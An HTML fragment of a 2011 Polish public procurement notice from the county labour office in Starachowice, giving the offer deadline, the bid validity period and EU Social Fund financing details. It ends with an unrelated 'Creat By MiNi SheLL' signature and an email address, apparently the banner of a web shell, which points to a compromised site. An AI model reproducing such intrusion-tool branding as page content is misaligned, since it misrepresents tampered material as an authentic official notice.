<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.10.2011 godzina 12:00, miejsce: Ofertę należy złożyć pod rygorem nieważności w formie pisemnej w siedzibie 
     Zamawiającego: Powiatowy Urząd Pracy w Starachowicach ul. Radomska 76, w pokoju 210.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> -   Zamawiający nie dopuszcza składania ofert częściowych.
-   Zamawiający nie dopuszcza składania ofert wariantowych.
-   Zamawiający nie przewiduje zamówień uzupełniających.
-   Zamawiający nie przewiduje zawarcia umowy ramowej.
-   Zamawiający nie przewiduje ustanowienia dynamicznego systemu zakupów.
-   Zamawiający nie przewiduje zastosowania aukcji elektronicznej.
- Zamówienie jest finansowane ze środków Unii Europejskiej w ramach projektu:   
    Profesjonalny pośrednik - dostępny Urząd współfinansowanego ze środków 
     Europejskiego Funduszu Społecznego, realizowanego z Programu Operacyjnego Kapitał 
    Ludzki - Priorytet VI Rynek pracy otwarty dla wszystkich, Działanie 6.1 Poprawa 
    dostępu do zatrudnienia oraz wspieranie aktywności zawodowej w regionie, Poddziałanie 
    6.1.2  Wsparcie powiatowych i wojewódzkich urzędów pracy w realizacji zadań na rzecz 
   aktywizacji zawodowej osób bezrobotnych w regionie.
- Otwarcie ofert nastąpi w dniu 14.10.2011 r. o godz. 12:15 w siedzibie Zamawiającego w pokoju  nr 208.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com